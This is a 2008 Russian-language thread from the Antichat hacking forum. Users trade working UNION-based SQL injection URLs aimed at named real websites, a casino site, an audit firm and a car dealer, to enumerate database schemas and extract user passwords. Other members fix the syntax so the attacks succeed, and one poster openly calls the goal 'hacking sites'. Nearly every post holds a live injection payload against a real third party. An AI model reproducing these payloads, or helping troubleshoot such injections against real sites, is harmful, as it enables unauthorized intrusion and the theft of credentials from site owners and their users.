ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5951  
Старый 11.07.2008, 13:39
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

slider слух у мну вопрос!Как ты вычислил ентот managerpassword и managerlogin ??? Методом тыка или как? Просто вот такой вот ссылкочкой например www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,column_schema)+from+informatio n_schema.columns+limit+1,1/*
Мне ошибку пишет!!! Обьясни плиз я в этом деле новичек ((
 
Ответить с цитированием

  #5952  
Старый 11.07.2008, 13:47
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

2 BanQui
А что это у тебя за столбец column_schema?
Может нужно так ?
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+1,1/*
Ошибки нету
 
Ответить с цитированием

  #5953  
Старый 11.07.2008, 14:02
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

СПс терь другой вопрос смари http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+1,1/* - Ошибки нет
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+2,1/* - Ошибки нет
И так до 4 а вот тут
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+5,1/* - Ошибка есть и дальше они тоже присутствуют!
 
Ответить с цитированием

  #5954  
Старый 11.07.2008, 14:06
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

мдауж, откуда ты взял этот table_schema ??? table_name!
 
Ответить с цитированием

  #5955  
Старый 11.07.2008, 14:15
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Omg!Приношу свой извенения за свой тупизм)))))Спасибо!!! Вазьму на заметку ИМХО много раз отступал от взлома сайтоф именно по этому((
 
Ответить с цитированием

  #5956  
Старый 11.07.2008, 14:18
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

статьи для кого пишут? почитай чтобы в следующий раз "не отступать от взлома" ))
 
Ответить с цитированием

  #5957  
Старый 11.07.2008, 14:31
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Кстати вот тут еще одну фигню нашел токо что то не получаетцо никак информатион схемку вывести! Версия 4.0.24_Debian-10sarge2-log
Вот как пытался и пытаюсь чтото менять но пока не выходит ((( http://www.audit.by/new/index.php?id=10&spr=-999999+union+select+1,2,table_name+from+informatio n_schema.tables+limit+1,1/*
 
Ответить с цитированием

  #5958  
Старый 11.07.2008, 14:33
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

см. мой совет выше ^-^
в 4.0.24 нет information_schema...
вапросы по уязвимостям тут, а то щас и тебе и мне минусов наставят...
 
Ответить с цитированием

  #5959  
Старый 11.07.2008, 15:33
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Ну и накурили тут вы =)

BanQui information_table есть только в пятой ветке скуля....
 
Ответить с цитированием

  #5960  
Старый 11.07.2008, 15:33
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Нашел вот енто

http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,concat(column_name,0x3 a,table_schema)%20FROM%20INFORMATION_SCHEMA.column s+limit+559,1/*

Попыталсо сделать вот так:
http://www.adams-motors.ru/new.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(0x 3a,user_newpasswd),0x71),0x71)%20FROM%20adamsold/*

Нече не выходит!!!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ